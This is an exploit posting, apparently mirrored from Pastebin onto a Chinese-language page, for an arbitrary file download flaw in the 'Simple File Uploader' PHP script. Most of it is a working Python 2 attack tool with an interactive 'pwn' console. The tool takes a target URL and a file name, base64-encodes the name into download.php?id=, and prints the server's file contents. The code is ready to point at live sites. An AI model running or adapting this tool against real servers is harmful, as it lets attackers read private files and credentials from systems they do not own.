Simple File Uploader - Arbitrary File Download
|
来源:https://pastebin.com/HeT7RuRU 作者:Godoy 发布时间:2017-04-28
|
|
# Exploit Title: Simple File Uploader - Arbitrary File Download # Date: 27/04/2017 # Exploit Author: Daniel Godoy # Vendor Homepage: https://codecanyon.net/ # Software Link: https://codecanyon.net/item/simple-file-uploader-explorer-and-manager-php-based-secured-file-manager/18393053 # Tested on: GNU/Linux # GREETZ: Rodrigo Mouriño, Rodrigo Avila, #RemoteExecution Team POC #!/usr/bin/env python #https://pastebin.com/HeT7RuRU import os,re,requests,time,base64 os.system('clear') BLUE = '\033[94m' RED = '\033[91m' GREEN = '\033[32m' CYAN = "\033[96m" WHITE = "\033[97m" YELLOW = "\033[93m" MAGENTA = "\033[95m" GREY = "\033[90m" DEFAULT = "\033[0m" def banner(): print WHITE+"" print " ## ## " print " ## ## " print " ############## " print " #### ###### #### " print " ###################### " print " ## ############## ## " print " ## ## ## ## " print " #### ####" print "" def details(): print WHITE+" =[" + YELLOW + "Simple File Uploader Download Tool v1.0.0 " print "" def core_commands(): os.system('clear') print WHITE+'''Core Commands\n===============\n Command\t\t\tDescription\n-------\t\t\t-----------\n ?\t\t\tHelp menu quit\t\t\tExit the console info\t\t\tDisplay information download\t\t\tExploit Vulnerability ''' def about(): os.system('clear') print WHITE+'''Simple File Uploader Download Tool v1.0.0 \n===============\n Author\t\t\tDescription\n-------\t\t\t-----------\n Daniel Godoy\t\thttps://www.exploit-db.com/author/?a=3146 ''' def download(): other = 'a' while other != 'n': urltarget = str(raw_input(WHITE+'Target: ')) filename = str(raw_input(WHITE+'FileName: ')) filename = base64.b64encode(filename) print RED+"[x]Sending Attack: "+WHITE+urltarget+'download.php?id='+filename final = urltarget+'download.php?id='+filename r = requests.get(final) print r.text other = str(raw_input(WHITE+'Test other file? y/n: ')) if other == "n": print "Type quit to exit. Bye!" banner() details() option='0' while option != 0: option = (raw_input(RED+"pwn" + WHITE +" > ")) if option == "quit": os.system('clear') option = 0 elif option == "?": core_commands() elif option == "help": core_commands() elif option == "about": about() elif option == "download": download() elif option == "info": about() else: print "Not a valid option! Need help? Press ? to display core commands " +GREEN
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|
|
|
|
|
推荐广告 |
|
|
|
|